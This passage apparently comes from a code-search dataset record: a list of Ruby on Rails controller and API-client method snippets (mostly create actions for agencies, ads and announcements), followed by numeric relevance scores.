auth_names,\n :return_type => return_type\n )\n\n data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options)\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: FundingSourcesApi#get_all_ach_funding_sources\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def index\n @lcb_feed_backs = LcbFeedBack.all\n end",
"def show\n\t\t@feeds = ExtensionFeed.paginate(page: params[:page],\n per_page: params[:per_page])\n\n\t\trespond_to do |format|\n\n\t\t\tformat.html { \n\t\t\t\trender locals: {\n\t\t\t\t\tfeeds: @feeds\n\t\t\t\t},\n\t\t\t\tlayout: false\n\t\t\t}\n\t\t\t\n\t\t\tformat.json # show.json.builder\n\t\tend\n\tend",
"def feed\n\n end",
"def news_feed\n begin\n client = Feedlr::Client.new(oauth_access_token: ENV['FEEDLY_OAUTH_ACCESS_TOKEN'])\n @latest_list = {}\n client.user_unread_counts.unreadcounts.each do |unread_articles|\n next if unread_articles['count'] == 0\n unread_article_items = client.stream_entries_contents(unread_articles.id, unreadOnly: true).items\n next if unread_article_items.empty?\n\n unread_article_items.each do |article|\n @latest_list[article.alternate[0].href] = \"◼︎ <a href='#{article.alternate[0].href}'>#{article.title} - #{article.origin.title}</a>\"\n end\n client.mark_article_as_read(unread_articles.id)\n end\n @latest_news = @latest_list.values.join(\"<br>\")\n rescue => evar\n fail evar\n end\n @latest_news\n end",
"def index\n @facebookads = Facebookad.all\n end",
"def salesApi\n require 'uri'\n require 'net/http'\n require 'json'\n\n #Arrays for each category\n \n @frequency = Hash.new(0)\n\n url = URI(\"https://api.salesloft.com/v2/people.json\")\n\n http = Net::HTTP.new(url.host, url.port)\n http.use_ssl = true\n\n request = Net::HTTP::Get.new(url)\n request[\"Authorization\"] = 'Bearer ' + ENV[\"API_KEY\"]\n\n response = http.request(request)\n \n @body = JSON.parse(response.body)['data']\n return @body\n end",
"def get_all_entries\n @feed_entries = FeedEntry.find(:all, :conditions => { :person_id => self.id}, :order => 'published_at DESC')\n end",
"def feed\n\t\t@goths = Goth.find(:all, :conditions => 'published_at IS NOT NULL', :limit => 10, :order => 'published_at DESC')\n\tend",
"def get_blog_feed\n # fetching a single feed\n @feed = []# Feedzirra::Feed.fetch_and_parse(\"http://norastable.wordpress.com/feed/\")\n end",
"def index\n @feeding_logs = FeedingLog.all\n end",
"def index\n @gadgets = Gadget.order(\"updated_at DESC\").limit(20)\n \n #initial right column data.\n get_one_gadget_by_one_category\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @gadgets }\n end\n end",
"def feed\n @data.feed ||= parsed_document.xpath(\"//link\").select{ |link|\n link.attributes[\"type\"] && link.attributes[\"type\"].value =~ /(atom|rss)/\n }.map { |link|\n absolutify_url(link.attributes[\"href\"].value)\n }.first rescue nil\n end",
"def all\n api_get(path)\n end",
"def feed\n end"
] | [
"0.65294206",
"0.64663476",
"0.6448661",
"0.6448661",
"0.6448661",
"0.6448661",
"0.6448661",
"0.63958734",
"0.63335794",
"0.62580824",
"0.62517816",
"0.62203056",
"0.6194411",
"0.6180867",
"0.6121181",
"0.6120239",
"0.61178607",
"0.6113262",
"0.610972",
"0.6106641",
"0.6102937",
"0.6075811",
"0.60726637",
"0.606673",
"0.60579914",
"0.6043135",
"0.60428756",
"0.60319215",
"0.6029084",
"0.6001137",
"0.5984129",
"0.5982739",
"0.59578496",
"0.59491444",
"0.5936012",
"0.5928839",
"0.59146625",
"0.5908672",
"0.5893742",
"0.58918744",
"0.58889663",
"0.5888582",
"0.58860755",
"0.58804154",
"0.5859071",
"0.5849843",
"0.5846881",
"0.5846699",
"0.58442414",
"0.581403",
"0.5804162",
"0.579913",
"0.5790942",
"0.57834077",
"0.57811344",
"0.57779706",
"0.5777541",
"0.5774268",
"0.57597476",
"0.5749095",
"0.5747034",
"0.572797",
"0.5726395",
"0.5726395",
"0.5717152",
"0.57130235",
"0.57021946",
"0.5694961",
"0.56879497",
"0.5687149",
"0.56785756",
"0.5667316",
"0.56626767",
"0.5662036",
"0.56609094",
"0.56568575",
"0.56556237",
"0.5641213",
"0.5633188",
"0.56321764",
"0.561713",
"0.5616888",
"0.5608373",
"0.55702",
"0.55669886",
"0.5562819",
"0.55572957",
"0.55571854",
"0.55507964",
"0.5543908",
"0.5543237",
"0.5542561",
"0.55421126",
"0.5537487",
"0.55350393",
"0.5532993",
"0.5526225",
"0.55247575",
"0.5519321",
"0.5518058"
] | 0.768968 | 0 |
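The index action in this row returns every AgencyFeed record through an explicit `render :index, status: :ok`, which implies a JSON view template (for example Jbuilder) rather than `render json:`. A minimal request-spec sketch for that behaviour; RSpec, the route, and the `name` attribute are all assumptions, not confirmed by the source:

    # spec/requests/agency_feeds_spec.rb -- hypothetical spec.
    require "rails_helper"

    RSpec.describe "GET /agencyfeed.json" do
      it "lists every agency feed with HTTP 200" do
        AgencyFeed.create!(name: "Example Feed") # attribute is an assumption
        get "/agencyfeed.json"
        expect(response).to have_http_status(:ok)
        expect(JSON.parse(response.body)).to be_an(Array)
      end
    end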
POST /agencyfeed.json Create an agency feed from the submitted params | def create
@agencyfeed = AgencyFeed.create! agencyfeed_params
render :show, status: :created
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def create\n @agency = Agency.new(agency_params)\n\n if @agency.save\n render json: @agency, status: :created, location: @agency\n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n\n if @agency.save\n render json: @agency, status: :created, location: @agency\n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n\n respond_to do |format|\n if @agency.save\n format.html { redirect_to @agency, notice: \"Agency was successfully created.\" }\n format.json { render :show, status: :created, location: @agency }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n respond_to do |format|\n if @agency.save\n format.html { redirect_to session[:redirect_to], notice: 'Agency was successfully created.' }\n #format.json { render action: 'show', status: :created, location: @agency }\n else\n format.html { render action: 'new' }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @news_agency = NewsAgency.new(params[:news_agency])\n\n respond_to do |format|\n if @news_agency.save\n format.html { redirect_to @news_agency, notice: 'News agency was successfully created.' }\n format.json { render json: @news_agency, status: :created, location: @news_agency }\n else\n format.html { render action: \"new\" }\n format.json { render json: @news_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @gtfs_agency = GtfsAgency.new(params[:gtfs_agency])\n\n respond_to do |format|\n if @gtfs_agency.save\n format.html { redirect_to(@gtfs_agency, :notice => 'Gtfs agency was successfully created.') }\n format.xml { render :xml => @gtfs_agency, :status => :created, :location => @gtfs_agency }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @gtfs_agency.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @admin_agency = Admin::Agency.new(params[:admin_agency])\n\n respond_to do |format|\n if @admin_agency.save\n format.html { redirect_to @admin_agency, notice: 'Agency was successfully created.' }\n format.json { render json: @admin_agency, status: :created, location: @admin_agency }\n else\n format.html { render action: \"new\" }\n format.json { render json: @admin_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n respond_to do |format|\n if @agency.save\n format.html { redirect_to @agency, notice: 'Agency was successfully created.' }\n format.json { render json: @agency, status: :created, location: @agency }\n else\n format.html { render action: \"new\" }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency_type = AgencyType.new(params[:agency_type])\n\n respond_to do |format|\n if @agency_type.save\n format.html { redirect_to @agency_type, notice: 'Agency type was successfully created.' }\n format.json { render json: @agency_type, status: :created, location: @agency_type }\n else\n format.html { render action: \"new\" }\n format.json { render json: @agency_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency_relationship = AgencyRelationship.new(params[:agency_relationship])\n\n respond_to do |format|\n if @agency_relationship.save\n flash[:notice] = 'AgencyRelationship was successfully created.'\n format.html { redirect_to(\n agency_relationship_url(@agency_relationship)) }\n else\n format.html { render :action => \"new\" }\n end\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n if @agency.save\n @agency = Agency.new\n @agencies = Agency.all\n @flag = true\n else\n @flag = false\n end\n end",
"def agency_params\n params.require(:agency).permit(:title, :description)\n end",
"def create\n if params['cancel']\n redirect_to agencies_url and return\n end\n @agency = Agency.new(agencies_params)\n @agency.updated_by = current_user.login\n\n publication = Publication.new(publication_params)\n @agency.publications << publication unless publication.empty?\n\n #@agency.build_restriction\n #@agency.restriction.update_attributes(params[:restriction])\n #@agency.restriction.states=params[:state_abbrevs].collect{|s| State.find(s)} unless params[:state_abbrevs].to_s.blank?\n #@agency.restriction.counties=params[:county_ids].collect{|c| County.find(c)} unless params[:county_ids].nil?\n #@agency.restriction.cities=params[:city_ids].collect{|c| City.find(c)} unless params[:city_ids].nil?\n #@agency.restriction.zips=params[:zip_ids].collect{|c| Zip.find(c)} unless params[:zip_ids].nil?\n\n #composed_of fields must be created manually\n update_pha_contact\n\n if @agency.save\n flash[:notice] = 'Agency was successfully created.'\n redirect_to agencies_url() and return if params['update_and_return']\n redirect_to edit_agency_url(@agency)\n else\n render :action => \"new\"\n end\n end",
"def create\n @registering_agency = RegisteringAgency.new(registering_agency_params)\n\n respond_to do |format|\n if @registering_agency.save\n format.html { redirect_to @registering_agency, notice: 'Registering agency was successfully created.' }\n format.json { render action: 'show', status: :created, location: @registering_agency }\n else\n format.html { render action: 'new' }\n format.json { render json: @registering_agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agency = Agency.new(agency_params)\n\n @manager = Management.new\n @manager.user = current_user\n @manager.agency = @agency\n @manager.save\n\n respond_to do |format|\n if @agency.save\n AdminMailer.new_agency(@agency).deliver\n format.html { redirect_to @agency, notice: 'Agency was successfully created.' }\n format.json { render :show, status: :created, location: @agency }\n else\n format.html { render :new }\n format.json { render json: @agency.errors, status: :unprocessable_entity }\n end\n end\n end",
"def agency_params\n params.require(:agency).permit(:title, :reg_number, :address, :phone, :status)\n end",
"def create\n fix_tokenized_input_params\n @ad = @org.ads.build(ad_params)\n\n respond_to do |format|\n if @ad.save\n format.html { redirect_to [@ad.org, @ad], notice: 'Ad was successfully created.' }\n format.json { render :show, status: :created, location: [@ad.org, @ad] }\n else\n format.html { render :new }\n format.json { render json: @ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @agency = Agency.new\n end",
"def agency_params\n params.require(:agency).permit( :name, :phone, :contact_name, :contact_email, :address, :latitude, :longitude, :website_url, :num_employees, :golden_pitch, :silver_pitch, :medium_risk_pitch, :high_risk_pitch, :agency )\n end",
"def agency_params\n params.require(:agency).permit(:code, :name, :description, :is_active)\n end",
"def agencies_create_test_agency(opts = {})\n data, _status_code, _headers = agencies_create_test_agency_with_http_info(opts)\n data\n end",
"def create\n @announcement = Announcement.new({title: params[:title], description: params[:description], price: params[:price], photo: params[:photo], user_id: params[:user_id], latitude: params[:latitude], longitude: params[:longitude], subcategory_id: params[:subcategory_id], place: params[:place]})\n @announcement.save\n render json:@announcement\n end",
"def agency_params\n params.require(:agency).permit(:name)\n end",
"def agencies_create_test_agency_with_http_info(opts = {})\n if @api_client.config.debugging\n @api_client.config.logger.debug 'Calling API: AgenciesApi.agencies_create_test_agency ...'\n end\n # resource path\n local_var_path = '/v1/agencies/_testAgency'\n\n # query parameters\n query_params = {}\n\n # header parameters\n header_params = {}\n # HTTP header 'Accept' (if needed)\n header_params['Accept'] = @api_client.select_header_accept(['application/json', 'text/json', 'text/html', 'application/xml', 'text/xml'])\n\n # form parameters\n form_params = {}\n\n # http body (model)\n post_body = nil\n auth_names = ['oauth2']\n data, status_code, headers = @api_client.call_api(:POST, local_var_path,\n :header_params => header_params,\n :query_params => query_params,\n :form_params => form_params,\n :body => post_body,\n :auth_names => auth_names,\n :return_type => 'DomainAgencyServiceV2ModelAgency')\n if @api_client.config.debugging\n @api_client.config.logger.debug \"API called: AgenciesApi#agencies_create_test_agency\\nData: #{data.inspect}\\nStatus code: #{status_code}\\nHeaders: #{headers}\"\n end\n return data, status_code, headers\n end",
"def create\n @tenancy_agreement = TenancyAgreement.new(params[:tenancy_agreement])\n @tenancy_agreement.estate_agent_id = current_user.estate_agent_id\n respond_to do |format|\n if @tenancy_agreement.save\n format.html { redirect_to tenancy_agreements_path, notice: 'Tenancy agreement was successfully created.' }\n format.json { render json: @tenancy_agreement, status: :created, location: @tenancy_agreement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @tenancy_agreement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @engagement_attendee = EngagementAttendee.new(engagement_params)\n if @engagement_attendee.save\n render :show, status: :created, location: api_v1_engagement_url(@engagement_attendee)\n else\n render json: @engagement_attendee.errors, status: :unprocessable_entity\n end\n end",
"def agency_params\n params.require(:agency).permit(:name, :description, :address, :user_id, :where, :photo, :photo_cache)\n end",
"def agency_params\n params.require(:agency).permit(:name, :city, :adress, :zipcode, :phone_number, :logo_agency_url, :siren)\n end",
"def agency_params\n params.require(:agency).permit(:name,\n :agycode,\n :photo,\n :description,\n :restrictions,\n :hours_of_operation,\n :address_id,\n :contact_name,\n :contact_phone,\n :contact_email,\n :services,\n :geographic_restrictions,\n :family_stipulations,\n :faith_based,\n :is_active,\n :general_information,\n { :service_ids => [] },\n address_attributes: [:id, :street_line_1, :street_line_2, :city, :state, :zip])\n end",
"def create\n @ally = Ally.new(ally_params)\n\n respond_to do |format|\n if @ally.save\n format.html { redirect_to @ally, notice: 'Ally was successfully created.' }\n format.json { render :show, status: :created, location: @ally }\n else\n format.html { render :new }\n format.json { render json: @ally.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advocacy = Advocacy.new(params[:advocacy])\n\n respond_to do |format|\n if @advocacy.save\n format.html { redirect_to @advocacy, notice: 'Advocacy was successfully created.' }\n format.json { render json: @advocacy, status: :created, location: @advocacy }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advocacy.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @age_tracker = AgeTracker.new(age_tracker_params)\n\n respond_to do |format|\n if @age_tracker.save\n format.html { redirect_to @age_tracker, notice: 'Age tracker was successfully created.' }\n format.json { render :show, status: :created, location: @age_tracker }\n else\n format.html { render :new }\n format.json { render json: @age_tracker.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @adj = Adj.new(adj_params)\n\n respond_to do |format|\n if @adj.save\n format.html { redirect_to @adj, notice: 'Adj was successfully created.' }\n format.json { render :show, status: :created, location: @adj }\n else\n format.html { render :new }\n format.json { render json: @adj.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @expense_tracker = ExpenseTracker.new(expense_tracker_params)\n\n respond_to do |format|\n if @expense_tracker.save\n format.html { redirect_to @expense_tracker, notice: 'Expense tracker was successfully created.' }\n format.json { render :show, status: :created, location: @expense_tracker }\n else\n format.html { render :new }\n format.json { render json: @expense_tracker.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #@adhub = Adhub.new(adhub_params)\n @adhub = current_user.adhubs.build(adhub_params)\n\n respond_to do |format|\n if @adhub.save\n format.html { redirect_to @adhub, notice: \"Advertisement was successfully created.\" }\n format.json { render :show, status: :created, location: @adhub }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @adhub.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @agenda_type = AgendaType.new(params[:agenda_type])\n\n respond_to do |format|\n if @agenda_type.save\n format.html { redirect_to @agenda_type, :notice => 'Agenda type was successfully created.' }\n format.json { render :json => @agenda_type, :status => :created, :location => @agenda_type }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @agenda_type.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def registering_agency_params\n params.require(:registering_agency).permit(:name, :description)\n end",
"def create\n @advertisment = Advertisment.new(params[:advertisment])\n\n respond_to do |format|\n if @advertisment.save\n format.html { redirect_to @advertisment, notice: 'Advertisment was successfully created.' }\n format.json { render json: @advertisment, status: :created, location: @advertisment }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advertisment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @news_agency = NewsAgency.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @news_agency }\n end\n end",
"def create\n @audience = Audience.new(params[:audience])\n\n respond_to do |format|\n if @audience.save\n format.html { redirect_to @audience, notice: 'Audience was successfully created.' }\n format.json { render json: @audience, status: :created, location: @audience }\n else\n format.html { render action: \"new\" }\n format.json { render json: @audience.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @agency_type = AgencyType.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @agency_type }\n end\n end",
"def CreateOrganization params = {}\n \n APICall(path: 'organizations.json',method: 'POST',payload: params.to_json)\n \n end",
"def create\n @ally = Ally.new(ally_params)\n\n respond_to do |format|\n if @ally.save\n format.html { redirect_to edit_ally_path(@ally), notice: 'Ally was successfully created.' }\n format.json { render :show, status: :created, location: @ally }\n else\n format.html { render :new }\n format.json { render json: @ally.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advert = Advert.new(params[:advert])\n\n respond_to do |format|\n if @advert.save\n format.html { redirect_to @advert, notice: 'Advert was successfully created.' }\n format.json { render json: @advert, status: :created, location: @advert }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advert.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_deal(**args)\n params = parameters(args) do\n required_params :title\n optional_params :title, :value, :currency, :user_id, :person_id, :org_id, :stage_id, :status, :probability, :lost_reason, :add_time, :visible_to\n end\n request(:post, 'deals', params)\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @agency }\n end\n end",
"def create\n UsersAgency.selection_from_ids(current_user, params[:agency_selection])\n head :created\n end",
"def create\n passenger = Passenger.new(:name => params[:name], :contact_number => params[:contact_number], :nationality => params[:nationality], :meal_pref => params[:meal_pref])\n passenger.save\n render :json => passenger\n end",
"def create\n @engagement = Engagement.new(params[:engagement])\n\n respond_to do |format|\n if @engagement.save\n format.html { redirect_to @engagement, notice: 'Engagement was successfully created.' }\n format.json { render json: @engagement, status: :created, location: @engagement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @engagement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = Ad.new(ad_params)\n\n if @ad.save\n render :show, status: :created, location: @ad\n else\n render json: @ad.errors, status: :unprocessable_entity\n end\n end",
"def create\n @early_pregnancy = EarlyPregnancy.new(params[:early_pregnancy])\n\n respond_to do |format|\n if @early_pregnancy.save\n format.html { redirect_to @early_pregnancy, notice: 'Early pregnancy was successfully created.' }\n format.json { render json: @early_pregnancy, status: :created, location: @early_pregnancy }\n else\n format.html { render action: \"new\" }\n format.json { render json: @early_pregnancy.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advert = Advert.new(advert_params)\n\n respond_to do |format|\n if @advert.save\n format.html { redirect_to @advert, notice: 'Advert was successfully created.' }\n format.json { render :show, status: :created, location: @advert }\n else\n format.html { render :new }\n format.json { render json: @advert.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @home_indices_ad = Home::Indices::Ad.new(params[:home_indices_ad])\n\n respond_to do |format|\n if @home_indices_ad.save\n format.html { redirect_to @home_indices_ad, notice: 'Ad was successfully created.' }\n format.json { render json: @home_indices_ad, status: :created, location: @home_indices_ad }\n else\n format.html { render action: \"new\" }\n format.json { render json: @home_indices_ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @allergy = Allergy.new(params[:allergy])\n\n respond_to do |format|\n if @allergy.save\n format.html { redirect_to(@allergy, :notice => 'Allergy was successfully created.') }\n format.xml { render :xml => @allergy, :status => :created, :location => @allergy }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @allergy.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @engraving = Engraving.new(engraving_params)\n\n respond_to do |format|\n if @engraving.save\n format.html { redirect_to @engraving, notice: 'Engraving was successfully created.' }\n format.json { render :show, status: :created, location: @engraving }\n else\n format.html { render :new }\n format.json { render json: @engraving.errors, status: :unprocessable_entity }\n end\n end\n end",
"def postEntityAdvertiserCreate( entity_id, tags, locations, max_tags, max_locations, expiry_date, is_national, language, reseller_ref, reseller_agent_id, publisher_id)\n params = Hash.new\n params['entity_id'] = entity_id\n params['tags'] = tags\n params['locations'] = locations\n params['max_tags'] = max_tags\n params['max_locations'] = max_locations\n params['expiry_date'] = expiry_date\n params['is_national'] = is_national\n params['language'] = language\n params['reseller_ref'] = reseller_ref\n params['reseller_agent_id'] = reseller_agent_id\n params['publisher_id'] = publisher_id\n return doCurl(\"post\",\"/entity/advertiser/create\",params)\n end",
"def create\n @dataload_ga = DataloadGa.new(params[:dataload_ga])\n\n respond_to do |format|\n if @dataload_ga.save\n format.html { redirect_to edit_dataload_ga_path(@dataload_ga), notice: 'Dataload ga was successfully created.' }\n format.json { render json: @dataload_ga, status: :created, location: @dataload_ga }\n else\n format.html { render action: \"new\" }\n format.json { render json: @dataload_ga.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @org_award = OrgAward.new(org_award_params)\n\n respond_to do |format|\n if @org_award.save\n format.html { redirect_to @org_award, notice: 'Org award was successfully created.' }\n format.json { render :show, status: :created, location: @org_award }\n else\n format.html { render :new }\n format.json { render json: @org_award.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @gtfs_agency = GtfsAgency.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @gtfs_agency }\n end\n end",
"def create\n @advertisement_campaign = AdvertisementCampaign.new(advertisement_campaign_params)\n\n respond_to do |format|\n if @advertisement_campaign.save\n format.html { redirect_to @advertisement_campaign, notice: 'Advertisement campaign was successfully created.' }\n format.json { render action: 'show', status: :created, location: @advertisement_campaign }\n else\n format.html { render action: 'new' }\n format.json { render json: @advertisement_campaign.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = Ad.new(params[:ad])\n\n respond_to do |format|\n if @ad.save\n format.html { redirect_to @ad, notice: 'Ad was successfully created.' }\n format.json { render json: @ad, status: :created, location: @ad }\n else\n format.html { render action: \"new\" }\n format.json { render json: @ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n official = Official.new(official_params)\n if official.save\n render json: official, status: 201, location: [:api, official]\n else\n failed_to_create(official, \"official\")\n end\n end",
"def create\n @advertisement = Advertisement.new(params[:advertisement])\n\n respond_to do |format|\n if @advertisement.save\n format.html { redirect_to @advertisement, notice: 'Advertisement was successfully created.' }\n format.json { render json: @advertisement, status: :created, location: @advertisement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @advertisement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @g_anewby = GAnewbie.new(g_anewby_params)\n\n respond_to do |format|\n if @g_anewby.save\n format.html { redirect_to @g_anewby, notice: 'G anewbie was successfully created.' }\n format.json { render action: 'show', status: :created, location: @g_anewby }\n else\n format.html { render action: 'new' }\n format.json { render json: @g_anewby.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = Ad.new(ad_params)\n\n respond_to do |format|\n if @ad.save\n format.html { redirect_to @ad, notice: 'Ad was successfully created.' }\n format.json { render :show, status: :created, location: @ad }\n else\n format.html { render :new }\n format.json { render json: @ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @announcement = Announcement.new(params[:announcement])\n\n respond_to do |format|\n if @announcement.save\n format.html { redirect_to @announcement, notice: 'Announcement was successfully created.' }\n format.json { render json: @announcement, status: :created, location: @announcement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @announcement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @announcement = Announcement.new(permitted_params)\n\n respond_to do |format|\n if @announcement.save\n format.html { redirect_to announcements_path, notice: 'Announcement was successfully created.' }\n format.json { render action: 'show', status: :created, location: @announcement }\n else\n format.html { render action: 'new' }\n format.json { render json: @announcement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @fundamental_announcement = Fundamental::Announcement.new(params[:fundamental_announcement])\n @fundamental_announcement.author = current_backend_user\n\n respond_to do |format|\n if @fundamental_announcement.save\n format.html { redirect_to @fundamental_announcement, notice: 'Announcement was successfully created.' }\n format.json { render json: @fundamental_announcement, status: :created, location: @fundamental_announcement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @fundamental_announcement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #@opportunity = Opportunity.new(params[:opportunity])\n #@building = Building.find(params[:building_id])\n \n respond_to do |format|\n if @opportunity.save\n flash[:notice] = 'Opportunity was successfully created.'\n format.html { redirect_to(opportunity_path(@opportunity)) }\n format.xml { render :xml => @opportunity, :status => :created, :location => @opportunity }\n else\n flash[:error] = 'Opportunity could not be created.'\n format.html { render :action => \"new\" }\n format.xml { render :xml => @opportunity.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @agent = Agent.new(params[:agent])\n if user_signed_in? && current_user.agent.agency?\n @agent.parent_id = current_user.agent.id\n end\n respond_to do |format|\n if @agent.save\n format.html { redirect_to(@agent, :notice => 'Ihr Auftragnehmerprofil wurde erfolgreich erstellt.') }\n format.xml { render :xml => @agent, :status => :created, :location => @agent }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @agent.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @hotel = Hotel.new(params[:hotel])\n\n respond_to do |format|\n if @hotel.save\n format.html { redirect_to @hotel, notice: 'Hotel was successfully created.' }\n format.json { render json: @hotel, status: :created, location: @hotel }\n else\n format.html { render action: \"new\" }\n format.json { render json: @hotel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = current_advertiser.ads.new(params[:ad])\n respond_to do |format|\n if @ad.save\n format.html { redirect_to(@ad, :notice => 'Ad was successfully created.') }\n format.xml { render :xml => @ad, :status => :created, :location => @ad }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @ad.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @admin_agency = Admin::Agency.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @admin_agency }\n end\n end",
"def create\n @test_dep_collector = TestDepCollector.new(test_dep_collector_params)\n\n respond_to do |format|\n if @test_dep_collector.save\n format.html {redirect_to @test_dep_collector, notice: 'Test dep collector was successfully created.'}\n format.json {render :show, status: :created, location: @test_dep_collector}\n else\n format.html {render :new}\n format.json {render json: @test_dep_collector.errors, status: :unprocessable_entity}\n end\n end\n end",
"def add_tenant_circle(args = {}) \n post(\"/tenantcircles.json/\", args)\nend",
"def create\n @tracker = Tracker.new(tracker_params)\n\n if @tracker.save\n render json: @tracker, status: :created, location: @tracker\n else\n render json: @tracker.errors, status: :unprocessable_entity\n end\n end",
"def create\n @attending = Attending.new(attending_params)\n\n respond_to do |format|\n if @attending.save\n format.html { redirect_to @attending, notice: 'Attending was successfully created.' }\n format.json { render :show, status: :created, location: @attending }\n else\n format.html { render :new }\n format.json { render json: @attending.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @assay = Assay.new(params[:assay])\n\n respond_to do |format|\n if @assay.save\n format.html { redirect_to @assay, notice: 'Assay was successfully created.' }\n format.json { render json: @assay, status: :created, location: @assay }\n else\n format.html { render action: \"new\" }\n format.json { render json: @assay.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @google_analytic = GoogleAnalytic.new(google_analytic_params)\n render json: @google_analytic.errors unless @google_analytic.save\n end",
"def create\n\t\tdestId = params[:destination_id]\n\t\tdestination = Destination.find_by_id(destId)\n\t\titinerary = Itinerary.create({tags: itinerary_params[:tags].split(\" \")})\n\t\ta = activity_params.first\n\t\tactivity = itinerary.activities.create({title: a[:title], tip: a[:tip], location: a[:location], photo: a[:photo], highlight: a[:highlight]})\n\t\trespond_with itinerary\n\tend",
"def create\n @ayudastemporal = Ayudastemporal.new(params[:ayudastemporal])\n\n respond_to do |format|\n if @ayudastemporal.save\n flash[:notice] = 'Ayudastemporal was successfully created.'\n format.html { redirect_to(@ayudastemporal) }\n format.xml { render :xml => @ayudastemporal, :status => :created, :location => @ayudastemporal }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @ayudastemporal.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @advertisement = current_user.ads.new(advertisement_params)\n\n respond_to do |format|\n if @advertisement.save\n format.html { redirect_to app_advertisements_url, notice: 'Advertisement was successfully created.' }\n format.json { render :show, status: :created, location: @advertisement }\n else\n format.html { render :new }\n format.json { render json: @advertisement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @engagement = current_user.engagements.new(engagement_params_with_school)\n if @engagement.save\n render :show, status: :created, location: api_v2_engagement_url(@engagement)\n else\n puts @engagement.errors.full_messages\n render json: @engagement.errors, status: :unprocessable_entity\n end\n end",
"def create\n @arsenal = Arsenal.new(arsenal_params)\n\n respond_to do |format|\n if @arsenal.save\n format.html { redirect_to @arsenal, notice: 'Arsenal was successfully created.' }\n format.json { render :show, status: :created, location: @arsenal }\n else\n format.html { render :new }\n format.json { render json: @arsenal.errors, status: :unprocessable_entity }\n end\n end\n end",
"def agency_params\n params.require(:agency).permit(I18n.t('agencies_controller.agency_params').map(&:to_sym))\n end",
"def create(params)\n post_url = url\n LightspeedCall.make('POST') { HTTParty.post(post_url, body: params.to_json, headers: {Authorization: \"Bearer #{LightspeedApi::OauthGrant.token}\", 'Accept' => 'application/json', 'Content-Type' => 'application/json' }) }\n end",
